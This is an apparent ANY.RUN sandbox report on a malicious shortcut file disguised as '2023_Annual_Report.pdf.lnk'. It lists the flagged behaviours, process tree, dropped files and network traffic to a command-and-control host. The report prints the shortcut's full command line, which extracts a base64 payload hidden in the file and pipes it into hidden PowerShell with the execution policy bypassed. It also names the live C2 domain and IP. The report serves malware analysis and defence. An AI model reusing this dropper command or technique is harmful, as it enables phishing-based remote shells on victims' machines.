File name:

2023_Annual_Report.pdf.lnk

Full analysis: https://app.any.run/tasks/4b358ce5-9ea3-4e00-9f1c-080aed8a2f8a
Verdict: Malicious activity
Analysis date: December 25, 2023, 13:09:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
httpshell
shell
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=1, Archive, ctime=Tue Nov 14 15:01:38 2023, mtime=Tue Dec 19 13:40:30 2023, atime=Tue Nov 14 15:01:38 2023, length=289792, window=hidenormalshowminimized
MD5:

BBC4414D76D1A765F3D525556F616EF9

SHA1:

C73E28D87FBBC8BE79ED1D421E78A41C29111A86

SHA256:

86F504DEA07FD952253904C468D83D9014A290E1FF5F2D103059638E07D14B09

SSDEEP:

768:zRxoFJQeDHeGYyhA5Z7JsCVResXebqwVCYm7/k/m7RU6d/dwiuGIjsZL2RxcNRyG:TBWYX5Z7JsCVCbqECB7cOm0OoxUURV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2056)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2056)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1004)

    • HTTPSHELL has been detected (SURICATA)

      • powershell.exe (PID: 3052)

    • Connects to the CnC server

      • powershell.exe (PID: 3052)

  • SUSPICIOUS

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 1004)
      • powershell.exe (PID: 3052)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 1004)

    • The process hides Powershell's copyright startup banner

      • cmd.exe (PID: 1004)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 2056)
      • cmd.exe (PID: 1004)

    • Uses ATTRIB.EXE to modify file attributes

      • powershell.exe (PID: 3052)

    • The process hide an interactive prompt from the user

      • cmd.exe (PID: 1004)

    • Reads the Internet Settings

      • powershell.exe (PID: 3052)

    • Unusual connection from system programs

      • powershell.exe (PID: 3052)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 3052)

  • INFO

    • Application launched itself

      • powershell.exe (PID: 2056)
      • AcroRd32.exe (PID: 1688)
      • RdrCEF.exe (PID: 324)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode
FileAttributes: Archive
CreateDate: 2023:11:14 17:01:38+01:00
AccessDate: 2023:12:19 15:40:30+01:00
ModifyDate: 2023:11:14 17:01:38+01:00
TargetFileSize: 289792
IconIndex: 1
RunWindow: Show Minimized No Activate
HotKey: Control-P
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
VolumeLabel: -
LocalBasePath: C:\Windows\System32\cmd.exe
Description: Adobe Acrobat PDF
RelativePath: ..\..\..\..\Windows\System32\cmd.exe
CommandLineArguments: /c start /B findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk > "%tmp%\Temp.jpg" & start /B pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "%tmp%\Temp.jpg"))) | POwERsHElL"
IconFileName: %SystemRoot%\System32\SHELL32.dll
MachineID: desktop-3nb8rdv
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
62
Monitored processes
11
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs findstr.exe no specs powershell.exe no specs #HTTPSHELL powershell.exe findstr.exe no specs attrib.exe no specs acrord32.exe no specs acrord32.exe no specs rdrcef.exe rdrcef.exe no specs rdrcef.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
284"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --channel=1688.0.1907551168 --type=renderer "C:\Users\admin\AppData\Local\Temp\Important.pdf"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeAcroRd32.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe Acrobat Reader DC
Exit code:
0
Version:
15.7.20033.133275
Modules
Images
c:\program files (x86)\adobe\acrobat reader dc\reader\acrord32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
324"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
AcroRd32.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe RdrCEF
Exit code:
0
Version:
15.7.20033.133275
Modules
Images
c:\program files (x86)\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
980"C:\Windows\system32\findstr.exe" /R JVBERi0xLjcNJeLjz9 2023_Annual_Report.pdf.lnkC:\Windows\System32\findstr.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
1004"C:\Windows\System32\cmd.exe" /c start /B findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk > "C:\Users\admin\AppData\Local\Temp\Temp.jpg" & start /B pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1412"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-delegated-renderer --disable-desktop-notifications --disable-file-system --disable-shared-workers --disable-speech-input --disable-threaded-compositing --disable-webaudio --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.7.20033 Chrome/35.0.1916.138" --disable-accelerated-compositing --disable-accelerated-video-decode --enable-software-compositing --disable-gpu-compositing --channel="324.0.1924040594\377808650" --allow-no-sandbox-job /prefetch:673131151C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeRdrCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe RdrCEF
Exit code:
0
Version:
15.7.20033.133275
Modules
Images
c:\program files (x86)\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1688"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\AppData\Local\Temp\Important.pdf"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exepowershell.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe Acrobat Reader DC
Exit code:
0
Version:
15.7.20033.133275
Modules
Images
c:\program files (x86)\adobe\acrobat reader dc\reader\acrord32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2056pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2164"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-delegated-renderer --disable-desktop-notifications --disable-file-system --disable-shared-workers --disable-speech-input --disable-threaded-compositing --disable-webaudio --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.7.20033 Chrome/35.0.1916.138" --disable-accelerated-compositing --disable-accelerated-video-decode --enable-software-compositing --disable-gpu-compositing --channel="324.1.1806427502\1684383477" --allow-no-sandbox-job /prefetch:673131151C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeRdrCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe RdrCEF
Exit code:
0
Version:
15.7.20033.133275
Modules
Images
c:\program files (x86)\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2308"C:\Windows\system32\attrib.exe" +h C:\Users\admin\Temp.jpgC:\Windows\System32\attrib.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2460findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk C:\Windows\System32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
Total events
5 121
Read events
5 115
Write events
6
Delete events
0

Modification events

(PID) Process:(284) AcroRd32.exeKey:HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\ExitSection
Operation:writeName:bLastExitNormal
Value:
1
(PID) Process:(324) RdrCEF.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
1
Suspicious files
26
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
3052powershell.exeC:\Users\admin\Temp.jpgtext
MD5:50514F94115E319477095FBEFA61257E
SHA256:4339E02A2557B36934BAF68B6E97DAAE04A3E118DA2A66915E6200579594D8C6
3052powershell.exeC:\Users\admin\AppData\Local\Temp\tzxyyoy0.ref.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2056powershell.exeC:\Users\admin\AppData\Local\Temp\3u3h3gqd.mbd.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3052powershell.exeC:\Users\admin\AppData\Local\Temp\Important.jpgtext
MD5:B23FF63019946154CF0914EC6296B192
SHA256:EF98AA9EA3D3AD4396982F620C948CC6B11B8723B81BA92A3116ED6E5B0E673F
2460findstr.exeC:\Users\admin\AppData\Local\Temp\Temp.jpgtext
MD5:50514F94115E319477095FBEFA61257E
SHA256:4339E02A2557B36934BAF68B6E97DAAE04A3E118DA2A66915E6200579594D8C6
284AcroRd32.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.284ps
MD5:6368FFED0226094E39FE8019CF4BE4A1
SHA256:04ED48A20FC51A155AB981884B4E81C1A9697A1CC82C05BD306BEB09FA444E8A
324RdrCEF.exeC:\Users\admin\AppData\Local\Temp\scoped_dir324_12841\data_0binary
MD5:CF89D16BB9107C631DAABF0C0EE58EFB
SHA256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
324RdrCEF.exeC:\Users\admin\AppData\Local\Temp\scoped_dir324_12841\data_2binary
MD5:0962291D6D367570BEE5454721C17E11
SHA256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
324RdrCEF.exeC:\Users\admin\AppData\Local\Temp\scoped_dir324_12841\indexbinary
MD5:E92B339388EA8E15578F1467D6A5E32E
SHA256:7A52AA916A5D84EACE421D99376BACB28DBC70F923724488DEB53B195C57B646
324RdrCEF.exeC:\Users\admin\AppData\Local\Temp\scoped_dir324_12841\data_3binary
MD5:41876349CB12D6DB992F1309F22DF3F0
SHA256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
7
DNS requests
2
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3052
powershell.exe
POST
200
185.185.71.250:80
http://pdf-online.top/api/v1/Client/Info
unknown
text
38 b
unknown
3052
powershell.exe
POST
200
185.185.71.250:80
http://pdf-online.top/api/v1/Client/Debug
unknown
text
7 b
unknown
3052
powershell.exe
GET
200
185.185.71.250:80
http://pdf-online.top/api/v1/Client/Token
unknown
text
7.01 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
352
svchost.exe
224.0.0.252:5355
unknown
324
RdrCEF.exe
34.199.101.34:443
cloud.acrobat.com
AMAZON-AES
US
unknown
3052
powershell.exe
185.185.71.250:80
pdf-online.top
Sprinthost.ru LLC
RU
unknown

DNS requests

Domain
IP
Reputation
cloud.acrobat.com
  • 34.199.101.34
  • 44.198.154.229
whitelisted
pdf-online.top
  • 185.185.71.250
malicious

Threats

PID
Process
Class
Message
352
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
3052
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
3052
powershell.exe
Malware Command and Control Activity Detected
SHELL [ANY.RUN] HTTP-Shell Multiplatform Reverse Shell Check-In
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
2023_Annual_Report.pdf.lnk